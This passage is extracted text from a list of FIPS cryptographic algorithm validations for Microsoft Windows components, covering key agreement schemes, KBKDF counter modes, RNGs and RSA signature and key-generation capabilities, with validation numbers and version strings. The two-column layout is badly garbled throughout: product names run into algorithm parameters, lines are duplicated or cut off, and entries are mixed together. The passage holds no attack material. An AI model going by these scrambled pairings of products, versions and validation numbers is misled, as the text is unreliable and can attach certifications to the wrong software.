Responder> ) ( EC: P-256 SHA256 HMAC ) ( ED: P-384
SHA384 HMAC ) ( EE: P-521 HMAC (SHA512,
HMAC_SHA512) ) ) ]
[ OnePassDH ( No_KC < KARole(s): Initiator /
HMAC_SHA512) ) ]
[ StaticUnified ( No_KC < KARole(s): Initiator /
HMAC_SHA512) ) ]
SHS Val#3790
ECDSA Val#1133
DRBG Val#1555
FFC: (FUNCTIONS INCLUDED IN IMPLEMENTATION: DPG Windows Embedded Compact Cryptographic Primitives
DPV KPG Partial Validation ) SCHEMES [ dhEphem ( Library (bcrypt.dll) #115
KARole(s): Initiator / Responder )
( FB: SHA256 ) ( FC: SHA256 ) ] Version 7.00.2872
[ dhOneFlow ( KARole(s): Initiator / Responder ) ( FB:
SHA256 ) ( FC: SHA256 ) ] [ dhStatic ( No_KC <
KARole(s): Initiator / Responder> ) ( FB: SHA256 HMAC
) ( FC: SHA256 HMAC ) ]
SHS Val# 3649
DSA Val#1188
DRBG Val#1430
DPV KPG Partial Validation Key Regeneration ) SCHEMES [
HMAC_SHA512) ) ) ]
HMAC_SHA512) ) ]
HMAC_SHA512) ) ]
FFC: (FUNCTIONS INCLUDED IN IMPLEMENTATION: DPG Windows Embedded Compact Cryptographic Primitives
DPV KPG Partial Validation ) SCHEMES [ dhEphem ( Library (bcrypt.dll) #114
KARole(s): Initiator / Responder )
( FB: SHA256 ) ( FC: SHA256 ) ] Version 8.00.6246
[ dhHybridOneFlow ( No_KC < KARole(s): Initiator /
Responder> ) ( FB:SHA256 HMAC ) ( FC: SHA256
HMAC ) ]
[ dhStatic ( No_KC < KARole(s): Initiator /
Responder> ) ( FB:SHA256 HMAC ) ( FC: SHA256
HMAC ) ]
SHS Val#3648
DSA Val#1187
DRBG Val#1429
EphemeralUnified ( No_KC ) ( EC: P-256 SHA256 HMAC
) ( ED: P-384 SHA384 HMAC ) ( EE: P-521 HMAC
(SHA512, HMAC_SHA512) ) ) ]
HMAC_SHA512) ) ]
HMAC_SHA512) ) ]
SHS Val#3648
ECDSA Val#1072
DRBG Val#1429
ECC: (FUNCTIONS INCLUDED IN IMPLEMENTATION: DPG Microsoft Windows 10 Anniversary Update, Windows
DPV KPG Full Validation Key Regeneration ) Server 2016, Windows Storage Server 2016; Microsoft
SCHEMES [ FullUnified ( No_KC < KARole(s): Initiator / Surface Book, Surface Pro 4 and Surface Pro 3 w/ Windows
Responder > < KDF: CONCAT > ) ( EC: P-256 10 Anniversary Update Virtual TPM Implementations #93
SHA256 HMAC ) ( ED: P-384 SHA384 HMAC ) ]
Version 10.0.14393
SHS Val# 3347 ECDSA Val#920 DRBG Val#1222
FFC: (FUNCTIONS INCLUDED IN IMPLEMENTATION: DPG Microsoft Windows 10 Anniversary Update, Windows
DPV KPG Partial Validation ) Server 2016, Windows Storage Server 2016; Microsoft
SCHEMES [ dhEphem ( KARole(s): Initiator / Responder ) Surface Book, Surface Pro 4, Surface Pro 3 and Surface 3
( FB: SHA256 ) ( FC: SHA256 ) ] w/ Windows 10 Anniversary Update; Microsoft Lumia 950
[ dhOneFlow ( KARole(s): Initiator / Responder ) ( FB: and Lumia 650 w/ Windows 10 Mobile Anniversary
SHA256 ) ( FC: SHA256 ) ] [ dhStatic (No_KC < Update Cryptography Next Generation (CNG)
KARole(s): Initiator / Responder > ) ( FB: SHA256 HMAC Implementations #92
) ( FC: SHA256 HMAC ) ]
Version 10.0.14393
SHS Val# 3347 DSA Val#1098 DRBG Val#1217
Responder > ) ( EC: P-256 SHA256 HMAC ) ( ED: P-384
HMAC_SHA512) ) ) ]
[ OnePassDH ( No_KC < KARole(s): Initiator / Responder
> ) ( EC: P-256 SHA256 HMAC ) ( ED: P-384 SHA384
HMAC ) ( EE: P-521 HMAC (SHA512, HMAC_SHA512) ) ]
[ StaticUnified ( No_KC < KARole(s): Initiator / Responder
SHS Val# 3347 DSA Val#1098 ECDSA Val#911 DRBG
Val#1217 HMAC Val#2651
FFC: (FUNCTIONS INCLUDED IN IMPLEMENTATION: DPG Microsoft Windows 10 November 2015 Update; Microsoft
DPV KPG Partial Validation ) SCHEMES [ dhEphem ( Surface Book, Surface Pro 4, Surface Pro 3, Surface 3,
KARole(s): Initiator / Responder ) Surface Pro 2, and Surface Pro w/ Windows 10 November
( FB: SHA256 ) ( FC: SHA256 ) ] 2015 Update; Windows 10 Mobile for Microsoft Lumia
[ dhOneFlow ( KARole(s): Initiator / Responder ) ( FB: 950 and Microsoft Lumia 635; Windows 10 for Microsoft
SHA256 ) ( FC: SHA256 ) ] [ dhStatic ( No_KC < Surface Hub and Surface Hub Cryptography Next
KARole(s): Initiator / Responder > ) ( FB: SHA256 HMAC Generation (CNG) Implementations #72
) ( FC: SHA256 HMAC ) ]
Version 10.0.10586
HMAC_SHA512) ) ) ]
FFC: (FUNCTIONS INCLUDED IN IMPLEMENTATION: DPG Microsoft Windows 10, Microsoft Surface Pro 3 with
DPV KPG Partial Validation ) SCHEMES [ dhEphem ( Windows 10, Microsoft Surface 3 with Windows 10,
KARole(s): Initiator / Responder ) Microsoft Surface Pro 2 with Windows 10, Microsoft
( FB: SHA256 ) ( FC: SHA256 ) ] Surface Pro with Windows 10 Cryptography Next
[ dhOneFlow ( KARole(s): Initiator / Responder ) ( FB: Generation (CNG) Implementations #64
SHA256 ) ( FC: SHA256 ) ] [ dhStatic ( No_KC <
KARole(s): Initiator / Responder > ) ( FB: SHA256 HMAC Version 10.0.10240
) ( FC: SHA256 HMAC ) ]
HMAC_SHA512) ) ) ]
FFC: (FUNCTIONS INCLUDED IN IMPLEMENTATION: DPG Windows Storage Server 2012 R2, Microsoft Windows RT
DPV KPG Partial Validation ) SCHEMES [ dhEphem ( 8.1, Microsoft Surface with Windows RT 8.1, Microsoft
KARole(s): Initiator / Responder ) Surface Pro with Windows 8.1, Microsoft Surface 2,
( FB: SHA256 ) ( FC: SHA256 ) ] Microsoft Surface Pro 2, Microsoft Surface Pro 3, Microsoft
[ dhOneFlow ( KARole(s): Initiator / Responder ) ( FB: Windows Phone 8.1, Microsoft Windows Embedded 8.1
SHA256 ) ( FC: SHA256 ) ] [ dhStatic ( No_KC < Industry and Microsoft StorSimple 8100 Cryptography
KARole(s): Initiator / Responder > ) ( FB: SHA256 HMAC Next Generation Cryptographic Implementations #47
) ( FC: SHA256 HMAC ) ]
Version 6.3.9600
SHS Val#2373 DSA Val#855 DRBG Val#489
HMAC_SHA512) ) ) ]
SHS Val#2373 ECDSA Val#505 DRBG Val#489
FFC: (FUNCTIONS INCLUDED IN IMPLEMENTATION: DPG Windows 8, Windows RT, Windows Server 2012, Surface
DPV KPG Partial Validation ) SCHEMES [ dhEphem ( Windows RT, Surface Windows 8 Pro, and Windows Phone 8
KARole(s): Initiator / Responder ) Cryptography Next Generation (CNG) Implementations #36
( FA: SHA256 ) ( FB: SHA256 ) ( FC: SHA256 ) ]
[ dhOneFlow ( KARole(s): Initiator / Responder ) ( FA:
SHA256 ) ( FB: SHA256 ) ( FC: SHA256 ) ]
[ dhStatic ( No_KC < KARole(s): Initiator /
Responder> ) ( FA: SHA256 HMAC ) ( FB: SHA256
HMAC ) ( FC: SHA256 HMAC ) ]
SHS #1903 DSA Val#687 DRBG #258
HMAC_SHA512) ) ) ]
[ OnePassDH( No_KC < KARole(s): Initiator /
Responder> ) ( EC: P-256 SHA256 ) ( ED: P-384
SHA384 ) ( EE: P-521 (SHA512, HMAC_SHA512) ) ) ]
HMAC_SHA512) ) ]
SHS #1903 ECDSA Val#341 DRBG #258
KAS (SP 800–56A) Windows 7 and SP1, vendor-affirmed

key agreement Windows Server 2008 R2 and SP1, vendor-affirmed
key establishment methodology provides 80 to 256 bits
of encryption strength
SP 800-108 Key-Based Key Derivation Functions (KBKDF )
Counter: Microsoft Surface Hub Virtual TPM Implementations #161

MACs: HMAC-SHA-1, HMAC-SHA-256,
HMAC-SHA-384 Version 10.0.15063.674
MAC prerequisite: HMAC #3271

Counter Location: Before Fixed Data
R Length: 32 (bits)
SPs used to generate K: SP 800-56A, SP 800-90A
K prerequisite: DRBG #1734, KAS #150

MACs: HMAC-SHA-1, HMAC-SHA-256, 10 S Fall Creators Update and Windows Server, Windows
HMAC-SHA-384 Server Datacenter (version 1709); Virtual TPM
MAC prerequisite: HMAC #3270
Version 10.0.16299
R Length: 32 (bits)
K prerequisite: DRBG #1733, KAS #149
Counter: Microsoft Surface Hub Cryptography Next Generation
MACs: CMAC-AES-128, CMAC-AES-192, (CNG) Implementations #159
CMAC-AES-256, HMAC-SHA-1, HMAC-SHA-
256, HMAC-SHA-384, HMAC-SHA-512 Version 10.0.15063.674
MAC prerequisite: AES #4902, HMAC #3269

R Length: 32 (bits)
K prerequisite: KAS #148
Counter: Windows 10 Mobile (version 1709) Cryptography Next

MACs: CMAC-AES-128, CMAC-AES-192, Generation (CNG) Implementations #158
CMAC-AES-256, HMAC-SHA-1, HMAC-SHA-
256, HMAC-SHA-384, HMAC-SHA-512 Version 10.0.15254
MAC prerequisite: AES #4901, HMAC #3268

R Length: 32 (bits)

MACs: CMAC-AES-128, CMAC-AES-192, 10 S Fall Creators Update and Windows Server, Windows
CMAC-AES-256, HMAC-SHA-1, HMAC-SHA- Server Datacenter (version 1709); Cryptography Next
256, HMAC-SHA-384, HMAC-SHA-512 Generation (CNG) Implementations #157
MAC prerequisite: AES #4897, HMAC #3267 Version 10.0.16299
R Length: 32 (bits)
CTR_Mode: ( Llength( Min0 Max0 ) MACSupported( Windows 10 Creators Update (version 1703) Pro,
[HMACSHA1] [HMACSHA256] [HMACSHA384] ) Enterprise, Education Virtual TPM Implementations #141
LocationCounter( [BeforeFixedData] ) rlength( [32] ) )
Version 10.0.15063
KAS Val#128
DRBG Val#1556
MAC Val#3062
CTR_Mode: ( Llength( Min20 Max64 ) MACSupported( Windows 10 Creators Update (version 1703) Home, Pro,
[CMACAES128] [CMACAES192] [CMACAES256] [HMACSHA1] Enterprise, Education, Windows 10 S, Windows 10 Mobile
[HMACSHA256] [HMACSHA384] [HMACSHA512] ) Cryptography Next Generation (CNG) Implementations
LocationCounter( [BeforeFixedData] ) rlength( [32] ) ) #140
KAS Val#127 Version 10.0.15063
AES Val#4624
DRBG Val#1555
MAC Val#3061
CTR_Mode: ( Llength( Min20 Max64 ) MACSupported( Microsoft Windows 10 Anniversary Update, Windows
[HMACSHA1] [HMACSHA256] [HMACSHA384] ) Server 2016, Windows Storage Server 2016; Microsoft
LocationCounter( [BeforeFixedData] ) rlength( [32] ) ) Surface Book, Surface Pro 4 and Surface Pro 3 w/ Windows
KAS Val#93 DRBG Val#1222 MAC Val#2661 #102
Version 10.0.14393
CTR_Mode: ( Llength( Min20 Max64 ) MACSupported( Microsoft Windows 10 Anniversary Update, Windows
[CMACAES128] [CMACAES192] [CMACAES256] Server 2016, Windows Storage Server 2016; Microsoft
[HMACSHA1] [HMACSHA256] [HMACSHA384] Surface Book, Surface Pro 4, Surface Pro 3 and Surface 3
[HMACSHA512] ) LocationCounter( [BeforeFixedData] ) w/ Windows 10 Anniversary Update; Microsoft Lumia 950
rlength( [32] ) ) and Lumia 650 w/ Windows 10 Mobile Anniversary
KAS Val#92 AES Val#4064 DRBG Val#1217 MAC Val#2651 Implementations #101
Version 10.0.14393
CTR_Mode: ( Llength( Min20 Max64 ) MACSupported( Microsoft Windows 10 November 2015 Update; Microsoft
[CMACAES128] [CMACAES192] [CMACAES256] Surface Book, Surface Pro 4, Surface Pro 3, Surface 3,
[HMACSHA1] [HMACSHA256] [HMACSHA384] Surface Pro 2, and Surface Pro w/ Windows 10 November
[HMACSHA512] ) LocationCounter( [BeforeFixedData] ) 2015 Update; Windows 10 Mobile for Microsoft Lumia
rlength( [32] ) ) 950 and Microsoft Lumia 635; Windows 10 for Microsoft
KAS Val#72 AES Val#3629 DRBG Val#955 MAC Val#2381 Generation (CNG) Implementations #72
Version 10.0.10586
CTR_Mode: ( Llength( Min20 Max64 ) MACSupported( Microsoft Windows 10, Microsoft Surface Pro 3 with
[CMACAES128] [CMACAES192] [CMACAES256] Windows 10, Microsoft Surface 3 with Windows 10,
[HMACSHA1] [HMACSHA256] [HMACSHA384] Microsoft Surface Pro 2 with Windows 10, Microsoft
[HMACSHA512] ) LocationCounter( [BeforeFixedData] ) Surface Pro with Windows 10 Cryptography Next
rlength( [32] ) ) Generation (CNG) Implementations #66
KAS Val#64 AES Val#3497 RBG Val#868 MAC Val#2233 Version 10.0.10240
CTR_Mode: ( Llength( Min0 Max0 ) MACSupported( Windows Storage Server 2012 R2, Microsoft Windows RT
[HMACSHA1] [HMACSHA256] [HMACSHA512] ) 8.1, Microsoft Surface with Windows RT 8.1, Microsoft
LocationCounter( [BeforeFixedData] ) rlength( [32] ) ) Surface Pro with Windows 8.1, Microsoft Surface 2,
DRBG Val#489 MAC Val#1773 Windows Phone 8.1, Microsoft Windows Embedded 8.1
Industry and Microsoft StorSimple 8100 Cryptography
Next Generation Cryptographic Implementations #30
Version 6.3.9600
CTR_Mode: ( Llength( Min0 Max4 ) MACSupported( Windows 8, Windows RT, Windows Server 2012, Surface
[HMACSHA1] [HMACSHA256] [HMACSHA512] ) Windows RT, Surface Windows 8 Pro, and Windows Phone 8
LocationCounter( [BeforeFixedData] ) rlength( [32] ) ) Cryptography Next Generation (CNG) Implementations #3
DRBG #258 HMAC Val#1345
Random Number Generator (RNG )

FIPS 186-2 General Purpose Windows 8, Windows RT, Windows Server 2012, Surface
[ (x-Original); (SHA-1) ] Cryptography Next Generation (CNG) Implementations #1110
FIPS 186-2 Windows Embedded Compact 7 Enhanced Cryptographic

[ (x-Original); (SHA-1) ] Provider (RSAENH) #1060
Windows CE 6.0 and Windows CE 6.0 R2 and Windows
Windows CE and Windows Mobile 6.0 and Windows
Mobile 6.5 Enhanced Cryptographic Provider (RSAENH)
#286
Windows CE 5.00 and Window CE 5.01 Enhanced
Cryptographic Provider (RSAENH) #66
FIPS 186-2 Windows 7 and SP1 and Windows Server 2008 R2 and
[ (x-Change Notice); (SHA-1) ] SP1 RNG Library #649
FIPS 186-2 General Purpose Windows Vista Ultimate SP1 and Windows Server 2008
[ (x-Change Notice); (SHA-1) ] RNG Implementation #435
Windows Vista RNG implementation #321
FIPS 186-2 General Purpose Windows Server 2003 SP2 Enhanced Cryptographic
[ (x-Change Notice); (SHA-1) ] Provider (RSAENH) #470
Windows XP Professional SP3 Kernel Mode Cryptographic
Module (fips.sys) #449
Windows Server 2003 SP2 Kernel Mode Cryptographic
FIPS 186-2 Windows XP Professional SP3 Enhanced DSS and Diffie-

[ (x-Change Notice); (SHA-1) ] Hellman Cryptographic Provider (DSSENH) #448
Windows Server 2003 SP2 Enhanced DSS and Diffie-
Hellman Cryptographic Provider #314
RSA

RSA: Microsoft Surface Hub Virtual TPM Implementations
#2677
186-4:
Signature Generation PKCS1.5: Version 10.0.15063.674
Mod 2048 SHA: SHA-1, SHA-256, SHA-
384
Signature Generation PSS:
Mod 2048:
SHA-1: Salt Length: 160 (bits)
Signature Verification PKCS1.5:
384
384
Signature Verification PSS:
Mod 2048:
Mod 3072:
RSA: Windows 10 Home, Pro, Enterprise, Education, Windows

186-4: Server Datacenter (version 1709); Virtual TPM
Signature Generation PKCS1.5: Implementations #2676
384 Version 10.0.16299
Mod 2048:
384
384
Mod 1024:
Mod 2048:
RSA: Microsoft Surface Hub RSA32 Algorithm Implementations
#2675
186-4:
Key Generation: Version 10.0.15063.674
384, SHA-512
384, SHA-512
384, SHA-512
RSA: Windows 10 Home, Pro, Enterprise, Education, Windows

186-4: Server Datacenter (version 1709); RSA32 Algorithm
Signature Verification PKCS1.5: Implementations #2674
384, SHA-512 Version 10.0.16299
384, SHA-512
384, SHA-512
RSA: Windows 10 Mobile (version 1709) RSA32 Algorithm

186-4:
Signature Verification PKCS1.5: Version 10.0.15254
384, SHA-512
384, SHA-512
384, SHA-512
RSA: Microsoft Surface Hub MsBignum Cryptographic
186-4:
Public Key Exponent: Fixed (10001)
Provable Primes with Conditions:
Mod lengths: 2048, 3072 (bits)
Primality Tests: C.3
Signature Generation PKCS1.5:
384, SHA-512
384, SHA-512
Mod 2048:
Mod 3072:
384, SHA-512
384, SHA-512
384, SHA-512
Mod 1024:
Mod 2048:
Mod 3072:
RSA: Microsoft Surface Hub SymCrypt Cryptographic
186-4:
Probable Random Primes:
384, SHA-512
384, SHA-512
Mod 2048:
Mod 3072:
384, SHA-512
384, SHA-512
384, SHA-512
Mod 1024:
Mod 2048:
Mod 3072:
RSA: Windows 10 Mobile (version 1709) SymCrypt
186-4:
Key Generation: Version 10.0.15254
Probable Random Primes:
384, SHA-512
384, SHA-512
Mod 2048:
Mod 3072:
384, SHA-512
384, SHA-512
384, SHA-512
Mod 1024:
Mod 2048:
Mod 3072:
RSA: Windows 10 Mobile (version 1709) MsBignum
186-4:
Key Generation: Version 10.0.15254
Public Key Exponent: Fixed (10001)
Provable Primes with Conditions:
384, SHA-512
384, SHA-512
Mod 2048:
Mod 3072:
384, SHA-512
384, SHA-512
384, SHA-512
Mod 1024:
Mod 2048:
Mod 3072:
186-4: Windows 10 Home, Pro, Enterprise, Education, Windows
Key Generation: 10 S Fall Creators Update and Windows Server, Windows
Public Key Exponent: Fixed (10001) Server Datacenter (version 1709); MsBignum
Provable Primes with Conditions: Cryptographic Implementations #2668
Mod lengths: 2048, 3072 (bits) Version 10.0.16299
384, SHA-512
384, SHA-512
Mod 2048:
Mod 3072:
384, SHA-512
384, SHA-512
384, SHA-512
Mod 1024:
Mod 2048:
Mod 3072:
186-4: Windows 10 Home, Pro, Enterprise, Education, Windows
Key Generation: 10 S Fall Creators Update and Windows Server, Windows
Probable Random Primes: Server Datacenter (version 1709); SymCrypt
Mod lengths: 2048, 3072 (bits) Cryptographic Implementations #2667
Primality Tests: C.2 Version 10.0.16299
384, SHA-512
384, SHA-512
Mod 2048:
Mod 3072:
384, SHA-512
384, SHA-512
384, SHA-512
Mod 1024:
Mod 2048:
Mod 3072:
FIPS186-4: Windows 10 Creators Update (version 1703) Pro,
ALG[RSASSA-PKCS1_V1_5] SIG(gen) (2048 SHA( 1 , 256 , Enterprise, Education Virtual TPM Implementations #2524
384 )) SIG(gen) with SHA-1 affirmed for use with protocols
only. Version 10.0.15063
SIG(Ver) (1024 SHA( 1 , 256 , 384 )) (2048 SHA( 1 , 256 , 384
))
[RSASSA-PSS]: Sig(Gen): (2048 SHA( 1 SaltLen( 20 ) , 256
SaltLen( 32 ) , 384 SaltLen( 48 ) )) SIG(gen) with SHA-1
affirmed for use with protocols only.
Sig(Ver): (1024 SHA( 1 SaltLen( 20 ) , 256 SaltLen( 32 ) , 384
SaltLen( 48 ) )) (2048 SHA( 1 SaltLen( 20 ) , 256 SaltLen( 32 ) ,
384 SaltLen( 48 ) ))
SHA Val#3790

ALG[RSASSA-PKCS1_V1_5] SIG(Ver) (1024 SHA( 1 , 256 , Enterprise, Education, Windows 10 S, Windows 10 Mobile
384 , 512 )) (2048 SHA( 1 , 256 , 384 , 512 )) (3072 SHA( 1 , RSA32 Algorithm Implementations #2523
256 , 384 , 512 ))
SHA Val#3790 Version 10.0.15063

186-4KEY(gen): FIPS186-4_Fixed_e ( 10001 ) ; Enterprise, Education, Windows 10 S, Windows 10 Mobile
PGM(ProbPrimeCondition): 2048 , 3072 PPTT:( C.3 ) MsBignum Cryptographic Implementations #2522
ALG[RSASSA-PKCS1_V1_5] SIG(gen) (2048 SHA( 1 , 256 ,
384 , 512 )) (3072 SHA( 1 , 256 , 384 , 512 )) SIG(gen) with Version 10.0.15063
SHA-1 affirmed for use with protocols only.
SIG(Ver) (1024 SHA( 1 , 256 , 384 , 512 )) (2048 SHA( 1 , 256 ,
384 , 512 )) (3072 SHA( 1 , 256 , 384 , 512 ))
SaltLen( 32 ) , 384 SaltLen( 48 ) , 512 SaltLen( 64 ) )) (3072
SHA( 1 SaltLen( 20 ) , 256 SaltLen( 32 ) , 384 SaltLen( 48 ) ,
512 SaltLen( 64 ) )) SIG(gen) with SHA-1 affirmed for use
SaltLen( 48 ) , 512 SaltLen( 62 ) )) (2048 SHA( 1 SaltLen( 20 ) ,
256 SaltLen( 32 ) , 384 SaltLen( 48 ) , 512 SaltLen( 64 ) ))
(3072 SHA( 1 SaltLen( 20 ) , 256 SaltLen( 32 ) , 384 SaltLen(
48 ) , 512 SaltLen( 64 ) ))
SHA Val#3790
DRBG: Val# 1555

186-4KEY(gen): Enterprise, Education, Windows 10 S, Windows 10 Mobile
PGM(ProbRandom: ( 2048 , 3072 ) PPTT:( C.2 ) SymCrypt Cryptographic Implementations #2521
ALG[RSASSA-PKCS1_V1_5] SIG(gen) (2048 SHA( 1 , 256 ,
384 , 512 )) (3072 SHA( 1 , 256 , 384 , 512 )) SIG(gen) with Version 10.0.15063
SHA-1 affirmed for use with protocols only.
SIG(Ver) (1024 SHA( 1 , 256 , 384 , 512 )) (2048 SHA( 1 , 256 ,
384 , 512 )) (3072 SHA( 1 , 256 , 384 , 512 ))
SaltLen( 32 ) , 384 SaltLen( 48 ) , 512 SaltLen( 64 ) )) (3072
SHA( 1 SaltLen( 20 ) , 256 SaltLen( 32 ) , 384 SaltLen( 48 ) ,
512 SaltLen( 64 ) )) SIG(gen) with SHA-1 affirmed for use
SaltLen( 48 ) , 512 SaltLen( 62 ) )) (2048 SHA( 1 SaltLen( 20 ) ,
256 SaltLen( 32 ) , 384 SaltLen( 48 ) , 512 SaltLen( 64 ) ))
(3072 SHA( 1 SaltLen( 20 ) , 256 SaltLen( 32 ) , 384 SaltLen(
48 ) , 512 SaltLen( 64 ) ))
SHA Val#3790
FIPS186-2: Windows Embedded Compact Enhanced Cryptographic
ALG[ANSIX9.31]: Provider (RSAENH) #2415
SIG(ver); 1024 , 1536 , 2048 , 3072 , 4096 , SHS: SHA-
1Val#3652 Version 7.00.2872
ALG[RSASSA-PKCS1_V1_5]: SIG(gen) 4096 , SHS: SHA-
256Val#3652, SHA-384Val#3652, SHA-512Val#3652
SIG(ver): 1024 , 1536 , 2048 , 3072 , 4096 , SHS: SHA-
1Val#3652, SHA-256Val#3652, SHA-384Val#3652, SHA-
512Val#3652
FIPS186-4:
ALG[ANSIX9.31] Sig(Gen): (2048 SHA( 1 )) (3072 SHA( 1
))
SIG(gen) with SHA-1 affirmed for use with protocols
only. Sig(Ver): (1024 SHA( 1 )) (2048 SHA( 1 )) (3072 SHA(
1 ))
ALG[RSASSA-PKCS1_V1_5] SIG(gen) (2048 SHA( 1 , 256
, 384 , 512 )) (3072 SHA( 1 , 256 , 384 , 512 )) SIG(gen)
with SHA-1 affirmed for use with protocols only.
SIG(Ver) (1024 SHA( 1 , 256 , 384 , 512 )) (2048 SHA( 1 ,
256 , 384 , 512 )) (3072 SHA( 1 , 256 , 384 , 512 ))
SHA Val#3652
FIPS186-2: Windows Embedded Compact Enhanced Cryptographic

SIG(ver); 1024 , 1536 , 2048 , 3072 , 4096 , SHS: SHA-
1Val#3651 Version 8.00.6246
ALG[RSASSA-PKCS1_V1_5]: SIG(gen) 4096 , SHS: SHA-
SIG(ver): 1024 , 1536 , 2048 , 3072 , 4096 , SHS: SHA-
512Val#3651
FIPS186-4:
ALG[ANSIX9.31] Sig(Gen): (2048 SHA( 1 )) (3072 SHA( 1
))
SIG(gen) with SHA-1 affirmed for use with protocols
only. Sig(Ver): (1024 SHA( 1 )) (2048 SHA( 1 )) (3072 SHA(
1 ))
, 384 , 512 )) (3072 SHA( 1 , 256 , 384 , 512 )) SIG(gen)
SIG(Ver) (1024 SHA( 1 , 256 , 384 , 512 )) (2048 SHA( 1 ,
256 , 384 , 512 )) (3072 SHA( 1 , 256 , 384 , 512 ))
SHA Val#3651
ALG[RSASSA-PKCS1_V1_5]: SIG(gen) 4096 , SHS: SHA- Library (bcrypt.dll) #2412
256Val# 3649 , SHA-384Val# 3649 , SHA-512Val# 3649
SIG(ver): 1024 , 1536 , 2048 , 3072 , 4096 , SHS: SHA- Version 7.00.2872
1Val# 3649 , SHA-256Val# 3649 , SHA-384Val# 3649 ,
SHA-512Val# 3649
FIPS186-4:
186-4KEY(gen): FIPS186-4_Fixed_e (10001) ;
PGM(ProbRandom: ( 2048 , 3072 ) PPTT:( C.2 )
, 384 , 512 )) (3072 SHA( 1 , 256 , 384 , 512 )) SIG(gen)
SIG(Ver) (1024 SHA( 1 , 256 , 384 , 512 )) (2048 SHA( 1 ,
256 , 384 , 512 )) (3072 SHA( 1 , 256 , 384 , 512 ))
SHA Val# 3649
DRBG: Val# 1430

ALG[RSASSA-PKCS1_V1_5]: SIG(gen) 4096 , SHS: SHA- Library (bcrypt.dll) #2411
SIG(ver): 1024 , 1536 , 2048 , 3072 , 4096 , SHS: SHA- Version 8.00.6246
512Val#3648
FIPS186-4:
186-4KEY(gen): FIPS186-4_Fixed_e (10001) ;
PGM(ProbRandom: ( 2048 , 3072 ) PPTT:( C.2 )
, 384 , 512 )) (3072 SHA( 1 , 256 , 384 , 512 )) SIG(gen)
SIG(Ver) (1024 SHA( 1 , 256 , 384 , 512 )) (2048 SHA( 1 ,
256 , 384 , 512 )) (3072 SHA( 1 , 256 , 384 , 512 ))
SHA Val#3648
DRBG: Val# 1429

ALG[RSASSA-PKCS1_V1_5] SIG(gen) (2048 SHA( 1 , 256 Server 2016, Windows Storage Server 2016; Microsoft
, 384 )) SIG(gen) with SHA-1 affirmed for use with Surface Book, Surface Pro 4 and Surface Pro 3 w/ Windows
protocols only. 10 Anniversary Update Virtual TPM Implementations
SIG(Ver) (1024 SHA( 1 , 256 , 384 )) (2048 SHA( 1 , 256 , #2206
384 ))
[RSASSA-PSS]: Sig(Gen): (2048 SHA( 1 SaltLen( 20 ) , 256 Version 10.0.14393
SaltLen( 32 ) , 384 SaltLen( 48 ) )) SIG(gen) with SHA-1
affirmed for use with protocols only.
Sig(Ver): (1024 SHA( 1 SaltLen( 20 ) , 256 SaltLen( 32 ) ,
384 SaltLen( 48 ) )) (2048 SHA( 1 SaltLen( 20 ) , 256
SaltLen( 32 ) , 384 SaltLen( 48 ) ))
SHA Val# 3347

186-4KEY(gen): FIPS186-4_Fixed_e ( 10001 ) ; Server 2016, Windows Storage Server 2016; Microsoft
PGM(ProbPrimeCondition): 2048 , 3072 PPTT:( C.3 ) Surface Book, Surface Pro 4, Surface Pro 3 and Surface 3
SHA Val# 3347 DRBG: Val# 1217 and Lumia 650 w/ Windows 10 Mobile Anniversary
Update RSA Key Generation Implementation #2195
Version 10.0.14393
FIPS186-4: soft Windows 10 Anniversary Update, Windows Server
ALG[RSASSA-PKCS1_V1_5] SIG(Ver) (1024 SHA( 1 , 256 , 2016, Windows Storage Server 2016; Microsoft Surface
384 , 512 )) (2048 SHA( 1 , 256 , 384 , 512 )) (3072 SHA( Book, Surface Pro 4, Surface Pro 3 and Surface 3 w/
1 , 256 , 384 , 512 )) Windows 10 Anniversary Update; Microsoft Lumia 950
SHA Val#3346 Update RSA32 Algorithm Implementations #2194
Version 10.0.14393

ALG[RSASSA-PKCS1_V1_5] SIG(gen) (2048 SHA( 256 , Server 2016, Windows Storage Server 2016; Microsoft
384 , 512 )) (3072 SHA( 256 , 384 , 512 )) Surface Book, Surface Pro 4, Surface Pro 3 and Surface 3
SIG(Ver) (1024 SHA( 1 , 256 , 384 , 512 )) (2048 SHA( 1 , w/ Windows 10 Anniversary Update; Microsoft Lumia 950
256 , 384 , 512 )) (3072 SHA( 1 , 256 , 384 , 512 )) and Lumia 650 w/ Windows 10 Mobile Anniversary
Update MsBignum Cryptographic Implementations #2193
SHA Val# 3347 DRBG: Val# 1217
Version 10.0.14393

[RSASSA-PSS]: Sig(Gen): (2048 SHA( 256 SaltLen( 32 ) , Server 2016, Windows Storage Server 2016; Microsoft
384 SaltLen( 48 ) , 512 SaltLen( 64 ) )) (3072 SHA( 256 Surface Book, Surface Pro 4, Surface Pro 3 and Surface 3
SaltLen( 32 ) , 384 SaltLen( 48 ) , 512 SaltLen( 64 ) )) w/ Windows 10 Anniversary Update; Microsoft Lumia 950
Sig(Ver): (1024 SHA( 1 SaltLen( 20 ) , 256 SaltLen( 32 ) , Update Cryptography Next Generation (CNG)
384 SaltLen( 48 ) , 512 SaltLen( 62 ) )) (2048 SHA( 1 Implementations #2192
SaltLen( 20 ) , 256 SaltLen( 32 ) , 384 SaltLen( 48 ) , 512
SaltLen( 64 ) )) (3072 SHA( 1 SaltLen( 20 ) , 256 SaltLen( Version 10.0.14393
32 ) , 384 SaltLen( 48 ) , 512 SaltLen( 64 ) ))
SHA Val# 3347 DRBG: Val# 1217

186-4KEY(gen): FIPS186-4_Fixed_e ( 10001 ) ; Surface Book, Surface Pro 4, Surface Pro 3, Surface 3,
PGM(ProbPrimeCondition): 2048 , 3072 PPTT:( C.3 ) Surface Pro 2, and Surface Pro w/ Windows 10 November
SHA Val# 3047 DRBG: Val# 955 950 and Microsoft Lumia 635; Windows 10 for Microsoft
Surface Hub 84” and Surface Hub 55” RSA Key Generation
Implementation #1889
Version 10.0.10586

ALG[RSASSA-PKCS1_V1_5] SIG(Ver) (1024 SHA( 1 , 256 , Surface Book, Surface Pro 4, Surface Pro 3, Surface 3,
384 , 512 )) (2048 SHA( 1 , 256 , 384 , 512 )) (3072 SHA( Surface Pro 2, and Surface Pro w/ Windows 10 November
1 , 256 , 384 , 512 )) 2015 Update; Windows 10 Mobile for Microsoft Lumia
SHA Val#3048 Surface Hub and Surface Hub RSA32 Algorithm
Version 10.0.10586
ALG[RSASSA-PKCS1_V1_5] SIG(gen) (2048 SHA( 256 , Surface Book, Surface Pro 4, Surface Pro 3, Surface 3,
384 , 512 )) (3072 SHA( 256 , 384 , 512 )) Surface Pro 2, and Surface Pro w/ Windows 10 November
